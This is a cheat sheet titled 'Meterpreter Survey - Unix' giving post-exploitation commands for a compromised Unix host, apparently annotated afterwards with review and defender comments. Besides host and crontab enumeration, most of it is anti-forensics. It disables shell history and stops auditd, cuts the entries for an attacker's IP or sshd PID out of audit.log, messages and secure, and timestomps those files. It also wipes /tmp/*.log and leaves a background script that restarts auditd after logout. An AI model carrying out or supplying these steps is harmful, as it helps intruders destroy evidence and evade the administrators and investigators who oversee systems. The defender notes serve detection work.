date: "2017-02-21" draft: false title: "Meterpreter Survey - Unix"
Init
- Situational Awareness
# Situational-awareness survey: read-only enumeration of the host — recent log
# activity, syslog/auditd configuration, services, processes, kernel, release,
# logged-in and recent users, shell history, modules, CPU, firewall rules, DNS,
# interfaces and sockets.
# In this extract the individual commands are collapsed onto one line (the
# `# if needed` remark was a trailing comment on `su root`); it is not runnable
# as a single line.
# `unset HISTFILE` is issued twice, once before and once after `su root`, so
# neither shell writes a history file for the session. Defender note: that only
# suppresses the interactive shell's history; auditd execve rules, process
# accounting and remotely forwarded syslog still record these commands.
# NOTE(review): the iptables / lsmod / audit-status reads presumably need root,
# hence the optional `su root` — confirm for the target distribution.
unset HISTFILEsu root# if neededunset HISTFILEdatedate +%sfind /var/log -type f -mmin -10 2> /dev/nullls -lart /var/logcat /etc/*syslog*.conf | grep -v "^#"service auditd status/sbin/chkconfig --listservice --status-allps -aefuname -acat /etc/*releasecat /etc/inittabwwho -alast -a -ilastloglastbuptimecat ~/.bash_history/sbin/lsmodvmstatcat /proc/cpuinfohostname/sbin/iptables -nL --line-numberscat /etc/resolv.conf/sbin/ifconfig -anetstat -antupps -aef
- Crontabs
# Crontab enumeration: for every account name in /etc/passwd, append the name and
# the output of `crontab -u <user> -l` to /tmp/crontabs, page through the file with
# `more`, delete it, then list /etc/cron* and print /etc/crontab.
# Collapsed onto one line in this extract; `done`, `cat`, `rm` and `ls` were
# separate commands.
# Review notes: /tmp/crontabs is a fixed, predictable path opened with `>>`, so
# anything already at that path (including a symlink planted by another local
# user) is appended to rather than replaced — a world-writable-directory hazard
# when run as root. `$(cut ...)` and `$user` are unquoted, which relies on account
# names containing no whitespace or glob characters. Accounts without a crontab
# presumably make `crontab -l` report an error on stderr, which is not captured
# in the file.
for user in $(cut -f1 -d: /etc/passwd); do echo $user >> /tmp/crontabs; crontab -u $user -l >> /tmp/crontabs; donecat /tmp/crontabs | morerm -f /tmp/crontabsls -la /etc/cron*cat /etc/crontab
- Suspicious files
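# Suspicious-file sweep: hidden entries and privileged (SUID / SGID) executables.
# The page's `–perm` / `–print0` were typed with an en dash (U+2013), which find
# does not accept as an option; they are restored here as ASCII `-perm` / `-print0`
# equivalents. Each find walks the whole filesystem from /, so unreadable
# directories report "Permission denied" on stderr when not run as root.
find / -type f -name ".*"                        # hidden files
find / -type d -name ".*"                        # hidden directories
# `-exec ... {} +` instead of `-print0 | xargs -0`: with no match, GNU xargs still
# runs `ls -l` once and lists the current directory; -exec simply runs nothing.
find / -user root -perm -4000 -exec ls -l {} +   # SUID root executables
find / -perm -2000 -exec ls -l {} +              # SGID programs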
Cleaning Logs
- Cleaning audit log
# Audit-log trimming as written on the page: locate the entries for <IP ADDR>,
# stop auditd, keep only the first <X> lines of audit.log (X = the line number
# before those entries) via a copy in /tmp, write the copy back over the original,
# restore mode 0600, set the mtime with `touch -t`, and delete the copy.
# Collapsed onto one line in this extract; the `# <X> = ...` and `# should be X
# lines` remarks were trailing comments on separate commands, and `<X>`,
# `YYYYMMDDHHmm.ss` and `@epoch time of last entry` are placeholders.
# Defender notes: the truncation leaves a time gap between the last surviving
# record and the first one after auditd is restarted; stopping the daemon is
# itself typically recorded by auditd; `touch -t` changes mtime but the ctime of
# the file is still set to the time of the edit, which `stat` shows; and none of
# this affects records already forwarded off-host (audisp remote, central
# syslog) — which is why remote, append-only log shipping is the primary control.
grep -n "<IP ADDR>" /var/log/audit/audit.logservice auditd stopwc -l /var/log/audit/audit.loghead -n <X>/var/log/audit/audit.log > /tmp/aud.log# <X> = line number before your entries startwc -l /tmp/aud.log# should be X linestail /tmp/aud.logdate -d @epoch time of last entrycat /tmp/aud.log > /var/log/audit/audit.logchmod 0600 /var/log/audit/audit.logtouch -t YYYYMMDDHHmm.ss /var/log/audit/audit.logls -al /var/log/audit/audit.logrm -f /tmp/aud.log
- Cleaning Messages log
# /var/log/messages trimming as written on the page: same head-N truncation
# pattern as the audit-log block — find the entries for <IP ADDR>, keep the first
# X lines via /tmp/msg.log, write them back, restore mode 0600, set the mtime with
# `touch -t`, delete the copy.
# Collapsed onto one line in this extract; the `# where X ...` and `# should be X
# lines` remarks were trailing comments. `X` and `YYYYMMDDHHmm.ss` are
# placeholders.
# Defender notes: unlike the audit block, the syslog daemon is not stopped here,
# so the file is rewritten underneath a live writer; a line-count drop, an
# out-of-order timestamp at the truncation point and a ctime newer than the
# mtime are all visible from the surviving file, and forwarded copies on a
# central syslog host are untouched.
grep -n "<IP ADDR>" /var/log/messageswc -l /var/log/messageshead -n X /var/log/messages > /tmp/msg.log# where X is the line number before your entries startwc -l /tmp/msg.log# should be X linestail /tmp/msg.logcat /tmp/msg.log > /var/log/messageschmod 0600 /var/log/messagestouch -t YYYYMMDDHHmm.ss /var/log/messagesls -al /var/log/messagesrm -f /tmp/msg.log
- Cleaning /var/log/secure
# /var/log/secure filtering as written on the page: show the lines tagged
# `sshd[<PID>]`, write every other line to /tmp/secure.log with `grep -v`, copy
# that back over /var/log/secure, show the tail, set the mtime with `touch -t`,
# and remove the copy (`rm -rf` on a regular file).
# Collapsed onto one line in this extract; `<PID>` and `YYYYMMDDHHmm.ss` are
# placeholders.
# Defender notes: this removes lines by pattern rather than truncating, so the
# surviving file keeps its timeline but loses records for one sshd PID;
# the file's ctime still reflects the edit, and off-host copies of the
# authentication log (central syslog) retain the removed lines — compare
# local and forwarded auth logs when tampering is suspected.
grep "sshd\[<PID>\]" /var/log/securegrep -v "sshd\[<PID>\]" /var/log/secure > /tmp/secure.logtail /tmp/secure.logcat /tmp/secure.log > /var/log/securetail -3 /var/log/securetouch -t YYYYMMDDHHmm.ss /var/log/securerm -rf /tmp/secure.log
Cleanup
- Delete any tmp files you created
# Temp-file cleanup: list /tmp, then delete every *.log in it.
# Collapsed onto one line in this extract (`ls` and `rm` were separate commands).
# Review note: the glob is broader than the heading ("tmp files you created")
# — it removes any /tmp/*.log, not just the /tmp/aud.log, /tmp/msg.log and
# /tmp/secure.log copies made above, so unrelated files of other users or
# services can be destroyed.
ls -l /tmprm -f /tmp/*.log
- Restart auditd after you logout
# Delayed auditd restart: writes a small /bin/sh script named X-unix into the
# current directory — sleep 30 seconds, then an EXIT trap runs `d`, which starts
# auditd and removes /tmp/X-unix — makes it executable, prints it, and runs it
# in the background so it outlives the operator's logout.
# Collapsed onto one line in this extract (`chmod`, `cat` and `./X-unix&` were
# separate commands).
# NOTE(review): the script is created as `X-unix` relative to the current
# directory but the trap deletes `/tmp/X-unix`; the two coincide only if the
# current directory is /tmp — not stated on the page.
# Defender notes: the restart produces a daemon-start record after the gap left
# by the earlier stop, and while the 30-second sleep runs a backgrounded
# `./X-unix` and its `sleep 30` child are visible in the process list; a
# short-lived executable appearing in /tmp is a common file-integrity /
# EDR alert.
echo -e '#!/bin/sh\nsleep 30\nfunction d {\nservice auditd start && rm -rf /tmp/X-unix\n}\ntrap d EXIT' > X-unixchmod 755 X-unixcat X-unix./X-unix&